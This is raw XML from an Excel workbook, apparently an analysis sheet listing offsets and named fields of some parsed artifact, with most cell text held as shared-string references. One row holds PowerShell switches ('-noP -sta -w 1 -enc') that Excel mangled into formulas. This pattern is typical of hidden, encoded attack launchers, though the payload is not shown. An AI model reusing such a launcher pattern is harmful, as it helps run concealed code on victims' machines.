    <tableColumn id="3" xr3:uid="{8BD68555-42B9-401D-A221-9508F4EA08FF}" name="Столбец3"/>
    <tableColumn id="4" xr3:uid="{B8D5C6BC-8BCC-4F56-A56B-AE25B94CE641}" name="Столбец4"/>
    <tableColumn id="5" xr3:uid="{AC18CCE2-AA65-4920-9A71-EA748DBFCA9D}" name="Столбец5"/>
    <tableColumn id="6" xr3:uid="{9E810A3A-121E-4048-8663-CA7C44FF7E6E}" name="Столбец6"/>
    <tableColumn id="7" xr3:uid="{6FF3067F-86FF-4DCD-B362-38A9CCED9C43}" name="Столбец7"/>
    <tableColumn id="8" xr3:uid="{0EC3C472-62F5-4207-8EFB-4EC853F4E096}" name="Столбец8"/>
    <tableColumn id="9" xr3:uid="{94CE08FB-421C-43F4-9344-617D9320043A}" name="Столбец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DA2DA-A075-4847-B32F-2E399E649D8C}" name="Таблица4" displayName="Таблица4" ref="A1:E9" totalsRowShown="0">
  <autoFilter ref="A1:E9" xr:uid="{587DA2DA-A075-4847-B32F-2E399E649D8C}"/>
  <tableColumns count="5">
    <tableColumn id="1" xr3:uid="{7CCB1288-45C9-453C-8CEE-26ABFD752075}" name="Столбец1"/>
    <tableColumn id="2" xr3:uid="{95437253-2F93-42C9-AB22-55B1D5C0A6A0}" name="Столбец2"/>
    <tableColumn id="3" xr3:uid="{7ECE42E8-8B72-499E-B319-F1FD3D360513}" name="Столбец3"/>
    <tableColumn id="4" xr3:uid="{4B6D2F3B-1E9D-4628-81A3-69C31F746380}" name="Столбец4"/>
    <tableColumn id="5" xr3:uid="{27F15B2A-735F-48FF-A036-C87996739310}" name="Столбец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B4F5EA-8F21-4975-8761-71DD9920ADC9}" name="Таблица5" displayName="Таблица5" ref="A1:F1048576" totalsRowShown="0">
  <autoFilter ref="A1:F1048576" xr:uid="{CEB4F5EA-8F21-4975-8761-71DD9920ADC9}">
    <filterColumn colId="1">
      <colorFilter dxfId="0"/>
    </filterColumn>
  </autoFilter>
  <sortState xmlns:xlrd2="http://schemas.microsoft.com/office/spreadsheetml/2017/richdata2" ref="A2:F1048576">
    <sortCondition ref="B1:B1048576"/>
  </sortState>
  <tableColumns count="6">
    <tableColumn id="1" xr3:uid="{95E281F9-17D9-4778-9360-336D5CDD336B}" name="Offset  "/>
    <tableColumn id="2" xr3:uid="{ADEEB456-717E-4387-8F67-FDD4EE6F302F}" name="Name "/>
    <tableColumn id="3" xr3:uid="{301C7572-1E64-4C68-BA69-A46A647C3A14}" name="Столбец1"/>
    <tableColumn id="4" xr3:uid="{3CA82D95-7A2D-4585-AB50-FF88B4603552}" name="Столбец2"/>
    <tableColumn id="5" xr3:uid="{9AF85506-B347-479B-A9CB-8D88DEDA1381}" name="Столбец3"/>
    <tableColumn id="6" xr3:uid="{4DD2A7B1-B2B7-4D50-B52F-AC024ADCC8BF}" name="Столбец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86269B-EC66-419E-9C64-25EA3BD45226}" name="Таблица6" displayName="Таблица6" ref="A1:J71" totalsRowShown="0">
  <autoFilter ref="A1:J71" xr:uid="{1486269B-EC66-419E-9C64-25EA3BD45226}"/>
  <tableColumns count="10">
    <tableColumn id="1" xr3:uid="{9054A185-6B19-4C26-B318-594711391991}" name="Столбец1"/>
    <tableColumn id="2" xr3:uid="{4B04B9EE-A51C-4B03-99C1-60BDE56386D9}" name="Столбец2"/>
    <tableColumn id="3" xr3:uid="{40CE1E89-4657-4D07-A644-991F9DA349A0}" name="Столбец3"/>
    <tableColumn id="4" xr3:uid="{E6C581D9-C5EA-41A6-A3EE-99C7076E22D5}" name="Столбец4"/>
    <tableColumn id="5" xr3:uid="{23DAC485-B1AD-4B76-9642-1EAED9EBF7E8}" name="Столбец5"/>
    <tableColumn id="6" xr3:uid="{AC1BFFFE-0B15-4813-AA28-F6684CE8371E}" name="Столбец6"/>
    <tableColumn id="7" xr3:uid="{4C65181F-96F6-4C08-B767-2FA10265F7B9}" name="Столбец7"/>
    <tableColumn id="8" xr3:uid="{967CAFF5-D348-4618-9526-9D652A09EB15}" name="Столбец8"/>
    <tableColumn id="9" xr3:uid="{948FF512-5AE1-45CA-BCA3-513E560BE8D9}" name="Столбец9"/>
    <tableColumn id="10" xr3:uid="{0CF12790-5D7A-4E77-830C-01FE56C83B38}" name="Столбец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32" sqref="A30:A32"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <cols>
    <col min="1" max="1" width="24.5703125" customWidth="1"/>
    <col min="2" max="2" width="39.5703125" customWidth="1"/>
    <col min="3" max="3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</row>
    <row r="3" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A3" t="s">
        <v>5</v>
      </c>
      <c r="B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  <row r="6" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A6" t="s">
        <v>11</v>
      </c>
      <c r="B6">
        <v>0</v>
      </c>
      <c r="C6" t="s">
        <v>12</v>
      </c>
    </row>
    <row r="7" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A7" t="s">
        <v>13</v>
      </c>
      <c r="B7">
        <v>1</v>
      </c>
      <c r="C7" t="s">
        <v>14</v>
      </c>
    </row>
    <row r="8" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A8" t="s">
        <v>15</v>
      </c>
      <c r="B8" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="9" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A9" t="s">
        <v>17</v>
      </c>
      <c r="B9" t="s">
        <v>18</v>
      </c>
    </row>
    <row r="10" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A10" t="s">
        <v>19</v>
      </c>
      <c r="B10">
        <v>1</v>
      </c>
    </row>
    <row r="11" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A11" t="s">
        <v>20</v>
      </c>
      <c r="B11" t="s">
        <v>21</v>
      </c>
    </row>
    <row r="12" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A12" t="s">
        <v>22</v>
      </c>
      <c r="B12" t="s">
        <v>23</v>
      </c>
    </row>
    <row r="13" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A13" t="s">
        <v>24</v>
      </c>
      <c r="B13">
        <v>332</v>
      </c>
    </row>
    <row r="14" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A14" t="s">
        <v>25</v>
      </c>
      <c r="B14">
        <v>1</v>
      </c>
    </row>
    <row r="15" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A15" t="s">
        <v>26</v>
      </c>
      <c r="B15" s="1">
        <v>43534</v>
      </c>
      <c r="C15" t="s">
        <v>27</v>
      </c>
    </row>
    <row r="16" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A16" t="s">
        <v>28</v>
      </c>
      <c r="B16" t="s">
        <v>29</v>
      </c>
    </row>
    <row r="17" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A17" t="s">
        <v>30</v>
      </c>
      <c r="B17" t="s">
        <v>31</v>
      </c>
    </row>
    <row r="18" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A18" t="s">
        <v>32</v>
      </c>
      <c r="B18">
        <v>6</v>
      </c>
    </row>
    <row r="19" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A19" t="s">
        <v>33</v>
      </c>
      <c r="B19">
        <v>1</v>
      </c>
    </row>
    <row r="20" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A20" t="s">
        <v>34</v>
      </c>
      <c r="B20" t="s">
        <v>35</v>
      </c>
      <c r="C20">
        <v>6</v>
      </c>
    </row>
    <row r="21" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A21" t="s">
        <v>34</v>
      </c>
      <c r="B21" t="s">
        <v>36</v>
      </c>
      <c r="C21">
        <v>1</v>
      </c>
    </row>
    <row r="22" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A22" t="s">
        <v>34</v>
      </c>
      <c r="B22" t="s">
        <v>37</v>
      </c>
      <c r="C22">
        <v>332</v>
      </c>
    </row>
    <row r="23" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A23" t="s">
        <v>34</v>
      </c>
      <c r="B23" t="s">
        <v>38</v>
      </c>
      <c r="C23" t="s">
        <v>39</v>
      </c>
      <c r="D23" t="s">
        <v>40</v>
      </c>
      <c r="E23">
        <v>9</v>
      </c>
      <c r="F23" s="2">
        <v>0.10751157407407408</v>
      </c>
      <c r="G23">
        <v>2019</v>
      </c>
    </row>
    <row r="25" spans="1:7" ht="45" x14ac:dyDescent="0.25">
      <c r="A25" s="11" t="s">
        <v>28105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8846-C5FA-4C56-A57F-E50D57734731}">
  <dimension ref="A1:J71"/>
  <sheetViews>
    <sheetView topLeftCell="A34" workbookViewId="0">
      <selection activeCell="D40" sqref="D40"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <cols>
    <col min="1" max="1" width="11.85546875" customWidth="1"/>
    <col min="2" max="2" width="21.42578125" customWidth="1"/>
    <col min="3" max="3" width="33.5703125" customWidth="1"/>
    <col min="4" max="4" width="16.85546875" customWidth="1"/>
    <col min="5" max="9" width="11.85546875" customWidth="1"/>
    <col min="10" max="10" width="12.85546875" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:10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</row>
    <row r="2" spans="1:10" x14ac:dyDescent="0.25">
      <c r="A2" t="s">
        <v>41</v>
      </c>
      <c r="B2" t="s">
        <v>28062</v>
      </c>
      <c r="C2" t="s">
        <v>28063</v>
      </c>
    </row>
    <row r="4" spans="1:10" x14ac:dyDescent="0.25">
      <c r="A4">
        <v>4</v>
      </c>
      <c r="B4" t="s">
        <v>53</v>
      </c>
      <c r="C4" t="s">
        <v>101</v>
      </c>
    </row>
    <row r="5" spans="1:10" x14ac:dyDescent="0.25">
      <c r="A5">
        <v>252</v>
      </c>
      <c r="B5" t="s">
        <v>59</v>
      </c>
      <c r="C5" t="s">
        <v>156</v>
      </c>
    </row>
    <row r="6" spans="1:10" x14ac:dyDescent="0.25">
      <c r="A6">
        <v>332</v>
      </c>
      <c r="B6" t="s">
        <v>61</v>
      </c>
      <c r="C6" t="s">
        <v>158</v>
      </c>
      <c r="D6" t="s">
        <v>159</v>
      </c>
      <c r="E6" t="s">
        <v>160</v>
      </c>
      <c r="F6" t="s">
        <v>161</v>
      </c>
      <c r="G6" t="s">
        <v>162</v>
      </c>
      <c r="H6" t="s">
        <v>163</v>
      </c>
      <c r="I6" t="s">
        <v>164</v>
      </c>
      <c r="J6" t="s">
        <v>28064</v>
      </c>
    </row>
    <row r="7" spans="1:10" x14ac:dyDescent="0.25">
      <c r="A7" t="s">
        <v>28065</v>
      </c>
      <c r="B7" t="s">
        <v>166</v>
      </c>
      <c r="C7" t="s">
        <v>167</v>
      </c>
      <c r="D7" t="s">
        <v>168</v>
      </c>
    </row>
    <row r="8" spans="1:10" x14ac:dyDescent="0.25">
      <c r="A8">
        <v>368</v>
      </c>
      <c r="B8" t="s">
        <v>64</v>
      </c>
      <c r="C8" t="s">
        <v>64</v>
      </c>
    </row>
    <row r="9" spans="1:10" x14ac:dyDescent="0.25">
      <c r="A9">
        <v>376</v>
      </c>
      <c r="B9" t="s">
        <v>61</v>
      </c>
      <c r="C9" t="s">
        <v>158</v>
      </c>
      <c r="D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164</v>
      </c>
      <c r="J9" t="s">
        <v>28064</v>
      </c>
    </row>
    <row r="10" spans="1:10" x14ac:dyDescent="0.25">
      <c r="A10" t="s">
        <v>28065</v>
      </c>
      <c r="B10" t="s">
        <v>166</v>
      </c>
      <c r="C10" t="s">
        <v>167</v>
      </c>
      <c r="D10" t="s">
        <v>168</v>
      </c>
    </row>
    <row r="11" spans="1:10" x14ac:dyDescent="0.25">
      <c r="A11">
        <v>404</v>
      </c>
      <c r="B11" t="s">
        <v>68</v>
      </c>
      <c r="C11" t="s">
        <v>68</v>
      </c>
    </row>
    <row r="12" spans="1:10" x14ac:dyDescent="0.25">
      <c r="A12">
        <v>464</v>
      </c>
      <c r="B12" t="s">
        <v>70</v>
      </c>
      <c r="C12" t="s">
        <v>28066</v>
      </c>
    </row>
    <row r="13" spans="1:10" x14ac:dyDescent="0.25">
      <c r="A13">
        <v>472</v>
      </c>
      <c r="B13" t="s">
        <v>73</v>
      </c>
      <c r="C13" t="s">
        <v>28067</v>
      </c>
    </row>
    <row r="14" spans="1:10" x14ac:dyDescent="0.25">
      <c r="A14">
        <v>480</v>
      </c>
      <c r="B14" t="s">
        <v>75</v>
      </c>
      <c r="C14" t="s">
        <v>28068</v>
      </c>
    </row>
    <row r="15" spans="1:10" x14ac:dyDescent="0.25">
      <c r="A15">
        <v>580</v>
      </c>
      <c r="B15" t="s">
        <v>77</v>
      </c>
      <c r="C15" t="s">
        <v>28069</v>
      </c>
      <c r="D15" t="e">
        <f>-k</f>
        <v>#NAME?</v>
      </c>
      <c r="E15" t="s">
        <v>28070</v>
      </c>
    </row>
    <row r="16" spans="1:10" x14ac:dyDescent="0.25">
      <c r="A16">
        <v>640</v>
      </c>
      <c r="B16" t="s">
        <v>80</v>
      </c>
      <c r="C16" t="s">
        <v>28071</v>
      </c>
    </row>
    <row r="17" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A17">
        <v>692</v>
      </c>
      <c r="B17" t="s">
        <v>77</v>
      </c>
      <c r="C17" t="s">
        <v>28069</v>
      </c>
      <c r="D17" t="e">
        <f t="shared" ref="D17:D23" si="0">-k</f>
        <v>#NAME?</v>
      </c>
      <c r="E17" t="s">
        <v>28072</v>
      </c>
    </row>
    <row r="18" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A18">
        <v>776</v>
      </c>
      <c r="B18" t="s">
        <v>77</v>
      </c>
      <c r="C18" t="s">
        <v>28073</v>
      </c>
      <c r="D18" t="e">
        <f t="shared" si="0"/>
        <v>#NAME?</v>
      </c>
      <c r="E18" t="s">
        <v>28074</v>
      </c>
    </row>
    <row r="19" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A19">
        <v>840</v>
      </c>
      <c r="B19" t="s">
        <v>77</v>
      </c>
      <c r="C19" t="s">
        <v>28073</v>
      </c>
      <c r="D19" t="e">
        <f t="shared" si="0"/>
        <v>#NAME?</v>
      </c>
      <c r="E19" t="s">
        <v>28075</v>
      </c>
    </row>
    <row r="20" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A20">
        <v>876</v>
      </c>
      <c r="B20" t="s">
        <v>77</v>
      </c>
      <c r="C20" t="s">
        <v>28069</v>
      </c>
      <c r="D20" t="e">
        <f t="shared" si="0"/>
        <v>#NAME?</v>
      </c>
      <c r="E20" t="s">
        <v>28041</v>
      </c>
    </row>
    <row r="21" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A21">
        <v>912</v>
      </c>
      <c r="B21" t="s">
        <v>77</v>
      </c>
      <c r="C21" t="s">
        <v>28069</v>
      </c>
      <c r="D21" t="e">
        <f t="shared" si="0"/>
        <v>#NAME?</v>
      </c>
      <c r="E21" t="s">
        <v>28076</v>
      </c>
    </row>
    <row r="22" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A22">
        <v>1020</v>
      </c>
      <c r="B22" t="s">
        <v>77</v>
      </c>
      <c r="C22" t="s">
        <v>28069</v>
      </c>
      <c r="D22" t="e">
        <f t="shared" si="0"/>
        <v>#NAME?</v>
      </c>
      <c r="E22" t="s">
        <v>28077</v>
      </c>
    </row>
    <row r="23" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A23">
        <v>1176</v>
      </c>
      <c r="B23" t="s">
        <v>77</v>
      </c>
      <c r="C23" t="s">
        <v>28069</v>
      </c>
      <c r="D23" t="e">
        <f t="shared" si="0"/>
        <v>#NAME?</v>
      </c>
      <c r="E23" t="s">
        <v>28078</v>
      </c>
    </row>
    <row r="24" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A24">
        <v>1280</v>
      </c>
      <c r="B24" t="s">
        <v>90</v>
      </c>
      <c r="C24" t="s">
        <v>28079</v>
      </c>
    </row>
    <row r="25" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A25">
        <v>1316</v>
      </c>
      <c r="B25" t="s">
        <v>77</v>
      </c>
      <c r="C25" t="s">
        <v>28069</v>
      </c>
      <c r="D25" t="e">
        <f>-k</f>
        <v>#NAME?</v>
      </c>
      <c r="E25" t="s">
        <v>28080</v>
      </c>
    </row>
    <row r="26" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A26">
        <v>1416</v>
      </c>
      <c r="B26" t="s">
        <v>77</v>
      </c>
      <c r="C26" t="s">
        <v>28073</v>
      </c>
      <c r="D26" t="e">
        <f>-k</f>
        <v>#NAME?</v>
      </c>
      <c r="E26" t="s">
        <v>28081</v>
      </c>
    </row>
    <row r="27" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A27">
        <v>1444</v>
      </c>
      <c r="B27" t="s">
        <v>77</v>
      </c>
      <c r="C27" t="s">
        <v>28069</v>
      </c>
      <c r="D27" t="e">
        <f>-k</f>
        <v>#NAME?</v>
      </c>
      <c r="E27" t="s">
        <v>28082</v>
      </c>
    </row>
    <row r="28" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A28">
        <v>1600</v>
      </c>
      <c r="B28" t="s">
        <v>96</v>
      </c>
      <c r="C28" t="s">
        <v>28083</v>
      </c>
      <c r="D28" t="s">
        <v>28084</v>
      </c>
    </row>
    <row r="29" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A29">
        <v>1652</v>
      </c>
      <c r="B29" t="s">
        <v>98</v>
      </c>
      <c r="C29" t="s">
        <v>28085</v>
      </c>
    </row>
    <row r="30" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A30">
        <v>1700</v>
      </c>
      <c r="B30" t="s">
        <v>96</v>
      </c>
      <c r="C30" t="s">
        <v>101</v>
      </c>
    </row>
    <row r="31" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A31">
        <v>1716</v>
      </c>
      <c r="B31" t="s">
        <v>102</v>
      </c>
      <c r="C31" t="s">
        <v>171</v>
      </c>
      <c r="D31" t="s">
        <v>28086</v>
      </c>
    </row>
    <row r="32" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A32">
        <v>1740</v>
      </c>
      <c r="B32" t="s">
        <v>104</v>
      </c>
      <c r="C32" t="s">
        <v>28083</v>
      </c>
      <c r="D32" t="s">
        <v>28087</v>
      </c>
    </row>
    <row r="33" spans="1:9" x14ac:dyDescent="0.25">
      <c r="A33">
        <v>1932</v>
      </c>
      <c r="B33" t="s">
        <v>106</v>
      </c>
      <c r="C33" t="s">
        <v>28088</v>
      </c>
    </row>
    <row r="34" spans="1:9" x14ac:dyDescent="0.25">
      <c r="A34">
        <v>2044</v>
      </c>
      <c r="B34" t="s">
        <v>77</v>
      </c>
      <c r="C34" t="s">
        <v>28069</v>
      </c>
      <c r="D34" t="e">
        <f>-k</f>
        <v>#NAME?</v>
      </c>
      <c r="E34" t="s">
        <v>28089</v>
      </c>
    </row>
    <row r="35" spans="1:9" x14ac:dyDescent="0.25">
      <c r="A35">
        <v>2604</v>
      </c>
      <c r="B35" t="s">
        <v>77</v>
      </c>
      <c r="C35" t="s">
        <v>28073</v>
      </c>
      <c r="D35" t="e">
        <f>-k</f>
        <v>#NAME?</v>
      </c>
      <c r="E35" t="s">
        <v>28090</v>
      </c>
    </row>
    <row r="36" spans="1:9" x14ac:dyDescent="0.25">
      <c r="A36">
        <v>2624</v>
      </c>
      <c r="B36" t="s">
        <v>113</v>
      </c>
      <c r="C36" t="s">
        <v>28091</v>
      </c>
      <c r="D36" t="s">
        <v>28092</v>
      </c>
    </row>
    <row r="37" spans="1:9" x14ac:dyDescent="0.25">
      <c r="A37">
        <v>324</v>
      </c>
      <c r="B37" t="s">
        <v>116</v>
      </c>
      <c r="C37" t="s">
        <v>28093</v>
      </c>
    </row>
    <row r="38" spans="1:9" x14ac:dyDescent="0.25">
      <c r="A38">
        <v>3300</v>
      </c>
      <c r="B38" t="s">
        <v>119</v>
      </c>
      <c r="C38" t="s">
        <v>28094</v>
      </c>
    </row>
    <row r="39" spans="1:9" x14ac:dyDescent="0.25">
      <c r="A39">
        <v>3484</v>
      </c>
      <c r="B39" t="s">
        <v>121</v>
      </c>
      <c r="C39" t="s">
        <v>176</v>
      </c>
    </row>
    <row r="40" spans="1:9" x14ac:dyDescent="0.25">
      <c r="A40">
        <v>3008</v>
      </c>
      <c r="B40" t="s">
        <v>123</v>
      </c>
      <c r="C40" t="s">
        <v>193</v>
      </c>
      <c r="D40" t="s">
        <v>194</v>
      </c>
      <c r="E40" t="s">
        <v>195</v>
      </c>
    </row>
    <row r="41" spans="1:9" x14ac:dyDescent="0.25">
      <c r="A41">
        <v>1540</v>
      </c>
      <c r="B41" t="s">
        <v>102</v>
      </c>
      <c r="C41" t="s">
        <v>171</v>
      </c>
      <c r="D41" t="s">
        <v>28095</v>
      </c>
    </row>
    <row r="42" spans="1:9" x14ac:dyDescent="0.25">
      <c r="A42">
        <v>3672</v>
      </c>
      <c r="B42" t="s">
        <v>126</v>
      </c>
      <c r="C42" t="s">
        <v>197</v>
      </c>
      <c r="D42" t="e">
        <f>-noP</f>
        <v>#NAME?</v>
      </c>
      <c r="E42" t="e">
        <f>-sta</f>
        <v>#NAME?</v>
      </c>
      <c r="F42" t="e">
        <f>-w</f>
        <v>#NAME?</v>
      </c>
      <c r="G42">
        <v>1</v>
      </c>
      <c r="H42" t="e">
        <f>-enc</f>
        <v>#NAME?</v>
      </c>
      <c r="I42" t="s">
        <v>28096</v>
      </c>
    </row>
    <row r="43" spans="1:9" x14ac:dyDescent="0.25">
      <c r="A43" t="s">
        <v>28042</v>
      </c>
    </row>
    <row r="44" spans="1:9" x14ac:dyDescent="0.25">
      <c r="A44" t="s">
        <v>28043</v>
      </c>
    </row>
    <row r="45" spans="1:9" x14ac:dyDescent="0.25">
      <c r="A45" t="s">
        <v>28044</v>
      </c>
    </row>
    <row r="46" spans="1:9" x14ac:dyDescent="0.25">
      <c r="A46" t="s">
        <v>28045</v>
      </c>
    </row>
    <row r="47" spans="1:9" x14ac:dyDescent="0.25">
      <c r="A47" t="s">
        <v>28046</v>
      </c>
    </row>
    <row r="48" spans="1:9" x14ac:dyDescent="0.25">
      <c r="A48" t="s">
        <v>28047</v>
      </c>
    </row>
    <row r="49" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A49" t="s">
        <v>28048</v>
      </c>
    </row>
    <row r="50" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A50" t="s">
        <v>28049</v>
      </c>
    </row>
    <row r="51" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A51" t="s">
        <v>28050</v>
      </c>
    </row>
    <row r="52" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A52" t="s">
        <v>28051</v>
      </c>
    </row>
    <row r="53" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A53" t="s">
        <v>28052</v>
      </c>
    </row>
    <row r="54" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A54" t="s">
        <v>28053</v>
      </c>
    </row>
    <row r="55" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A55" t="s">
        <v>28054</v>
      </c>
    </row>
    <row r="56" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A56" t="s">
        <v>28055</v>
      </c>
    </row>
    <row r="57" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A57" t="s">
        <v>28056</v>
      </c>
    </row>
    <row r="58" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A58" t="s">
        <v>28057</v>
      </c>
    </row>
    <row r="59" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A59" t="s">
        <v>28058</v>
      </c>
    </row>
    <row r="60" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A60" t="s">
        <v>28059</v>
      </c>
    </row>
    <row r="61" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A61" t="s">
        <v>28060</v>
      </c>
    </row>
    <row r="62" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A62" t="s">
        <v>28061</v>
      </c>
    </row>
    <row r="63" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A63">
        <v>2700</v>
      </c>
      <c r="B63" t="s">
        <v>128</v>
      </c>
      <c r="C63" t="s">
        <v>28097</v>
      </c>
    </row>
    <row r="64" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A64">
        <v>992</v>
      </c>
      <c r="B64" t="s">
        <v>131</v>
      </c>
      <c r="C64" t="s">
        <v>28083</v>
      </c>
      <c r="D64" t="s">
        <v>178</v>
      </c>
      <c r="E64" t="s">
        <v>28098</v>
      </c>
      <c r="F64" t="e">
        <f>-restart</f>
        <v>#NAME?</v>
      </c>
      <c r="G64" t="s">
        <v>181</v>
      </c>
    </row>
    <row r="65" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A65">
        <v>1776</v>
      </c>
      <c r="B65" t="s">
        <v>131</v>
      </c>
      <c r="C65" t="s">
        <v>28083</v>
      </c>
      <c r="D65" t="s">
        <v>178</v>
      </c>
      <c r="E65" t="s">
        <v>28098</v>
      </c>
      <c r="F65" t="s">
        <v>184</v>
      </c>
      <c r="G65" t="s">
        <v>185</v>
      </c>
      <c r="H65" t="s">
        <v>186</v>
      </c>
    </row>
    <row r="66" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A66">
        <v>1988</v>
      </c>
      <c r="B66" t="s">
        <v>134</v>
      </c>
      <c r="C66" t="s">
        <v>28099</v>
      </c>
      <c r="D66" t="s">
        <v>28100</v>
      </c>
    </row>
    <row r="67" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A67">
        <v>2480</v>
      </c>
      <c r="B67" t="s">
        <v>136</v>
      </c>
      <c r="C67" t="s">
        <v>28101</v>
      </c>
    </row>
    <row r="68" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A68">
        <v>3292</v>
      </c>
      <c r="B68" t="s">
        <v>136</v>
      </c>
      <c r="C68" t="s">
        <v>28101</v>
      </c>
    </row>
    <row r="69" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A69">
        <v>2412</v>
      </c>
      <c r="B69" t="s">
        <v>141</v>
      </c>
      <c r="C69" t="s">
        <v>28102</v>
      </c>
    </row>
    <row r="70" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A70">
        <v>1812</v>
      </c>
      <c r="B70" t="s">
        <v>144</v>
      </c>
      <c r="C70" t="s">
        <v>145</v>
      </c>
      <c r="D70" t="s">
        <v>28103</v>
      </c>
      <c r="E70" t="s">
        <v>28104</v>
      </c>
    </row>
    <row r="71" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A71">
        <v>1984</v>
      </c>
      <c r="B71" t="s">
        <v>148</v>
      </c>
      <c r="C71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CCB5-7258-4E10-A704-BA0463882010}">
  <dimension ref="A1:O48"/>
  <sheetViews>
    <sheetView topLeftCell="A16" workbookViewId="0">
      <selection activeCell="A39" sqref="A39"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <cols>
    <col min="3" max="3" width="19.28515625" customWidth="1"/>
    <col min="4" max="4" width="16.42578125" customWidth="1"/>
    <col min="9" max="9" width="12.7109375" customWidth="1"/>
    <col min="12" max="12" width="13" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:1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3" spans="1:13" x14ac:dyDescent="0.25">
      <c r="A3">
        <v>4</v>
      </c>
      <c r="B3">
        <v>0</v>
      </c>
      <c r="C3" t="s">
        <v>53</v>
      </c>
      <c r="D3" t="s">
        <v>54</v>
      </c>
      <c r="E3">
        <v>90</v>
      </c>
      <c r="F3">
        <v>566</v>
      </c>
      <c r="G3" t="s">
        <v>55</v>
      </c>
      <c r="H3" t="s">
        <v>8</v>
      </c>
      <c r="I3" s="1">
        <v>43534</v>
      </c>
      <c r="J3" t="s">
        <v>56</v>
      </c>
      <c r="K3" t="s">
        <v>57</v>
      </c>
      <c r="L3" t="s">
        <v>55</v>
      </c>
      <c r="M3" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="4" spans="1:13" x14ac:dyDescent="0.25">
      <c r="A4">
        <v>252</v>
      </c>
      <c r="B4">
        <v>4</v>
      </c>
      <c r="C4" t="s">
        <v>59</v>
      </c>
      <c r="D4" t="s">
        <v>60</v>
      </c>
      <c r="E4">
        <v>2</v>
      </c>
      <c r="F4">
        <v>29</v>
      </c>
      <c r="G4" t="s">
        <v>55</v>
      </c>
      <c r="H4" t="s">
        <v>8</v>
      </c>
      <c r="I4" s="1">
        <v>43534</v>
      </c>
      <c r="J4" t="s">
        <v>56</v>
      </c>
      <c r="K4" t="s">
        <v>57</v>
      </c>
      <c r="L4" t="s">
        <v>55</v>
      </c>
      <c r="M4" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="5" spans="1:13" x14ac:dyDescent="0.25">
      <c r="A5">
        <v>332</v>
      </c>
      <c r="B5">
        <v>324</v>
      </c>
      <c r="C5" t="s">
        <v>61</v>
      </c>
      <c r="D5" t="s">
        <v>62</v>
      </c>
      <c r="E5">
        <v>9</v>
      </c>
      <c r="F5">
        <v>503</v>
      </c>
      <c r="G5">
        <v>0</v>
      </c>
      <c r="H5" t="s">
        <v>8</v>
      </c>
      <c r="I5" s="1">
        <v>43534</v>
      </c>
      <c r="J5" t="s">
        <v>63</v>
      </c>
      <c r="K5" t="s">
        <v>57</v>
      </c>
      <c r="L5" t="s">
        <v>55</v>
      </c>
      <c r="M5" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="6" spans="1:13" x14ac:dyDescent="0.25">
      <c r="A6">
        <v>368</v>
      </c>
      <c r="B6">
        <v>324</v>
      </c>
      <c r="C6" t="s">
        <v>64</v>
      </c>
      <c r="D6" t="s">
        <v>65</v>
      </c>
      <c r="E6">
        <v>3</v>
      </c>
      <c r="F6">
